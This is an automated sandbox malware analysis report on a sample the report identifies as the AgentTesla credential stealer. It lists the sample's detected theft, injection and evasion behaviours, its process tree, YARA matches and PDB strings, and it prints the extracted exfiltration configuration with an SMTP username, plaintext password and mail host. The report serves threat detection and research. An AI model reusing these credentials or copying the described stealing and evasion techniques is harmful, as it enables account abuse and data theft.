Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report W7UbgU8x18

Overview

General Information

Sample Name:W7UbgU8x18 (renamed file extension from none to exe)
Analysis ID:528611
MD5:01f140fea9669403791fb89c47138d69
SHA1:c4278cf25da52adc05f4d2161a11c7b96928ccea
SHA256:f135fdb20bb785afb947173d0bbfdfedd1ce5b8c4907f6aa37e9a9a706d8a1db
Tags:32AgentTeslaexetrojan
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • W7UbgU8x18.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\W7UbgU8x18.exe" MD5: 01F140FEA9669403791FB89C47138D69)
    • conhost.exe (PID: 1768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_regbrowsers.exe (PID: 408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
    • aspnet_regbrowsers.exe (PID: 4896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
    • WerFault.exe (PID: 6380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "oazahotel@oazahotel.com.mk", "Password": "Oazah2020", "Host": "odin.mk-host.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.0.aspnet_regbrowsers.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              2.0.aspnet_regbrowsers.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.W7UbgU8x18.exe.3938940.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.W7UbgU8x18.exe.3938940.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    2.0.aspnet_regbrowsers.exe.400000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.0.W7UbgU8x18.exe.3938940.7.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "oazahotel@oazahotel.com.mk", "Password": "Oazah2020", "Host": "odin.mk-host.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: W7UbgU8x18.exeVirustotal: Detection: 35%Perma Link
                      Source: W7UbgU8x18.exeReversingLabs: Detection: 28%
                      Machine Learning detection for sampleShow sources
                      Source: W7UbgU8x18.exeJoe Sandbox ML: detected
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.aspnet_regbrowsers.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.2.aspnet_regbrowsers.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.aspnet_regbrowsers.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: W7UbgU8x18.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb""9s source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.270613865.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270476484.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.283477132.000000000501C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270533710.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271835064.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270427827.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb" source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb, source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: ore.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb6 source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: fixedhost.pdb\ source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3|n source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb source: W7UbgU8x18.exe
                      Source: Binary string: fixedhost.pdbMZ@ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Z.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb* source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb4 source: WER343.tmp.dmp.10.dr
                      Source: Binary string: mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Windows\tuneraidfix.pdbpdbfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdbP source: W7UbgU8x18.exe, 00000000.00000000.256076792.0000000000C18000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000002.302604429.0000000000C18000.00000004.00000020.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\user\Desktop\W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: winhttp.pdbW source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER343.tmp.dmp.10.dr
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdbK source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: lC:\Users\user\Desktop\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb:8 source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
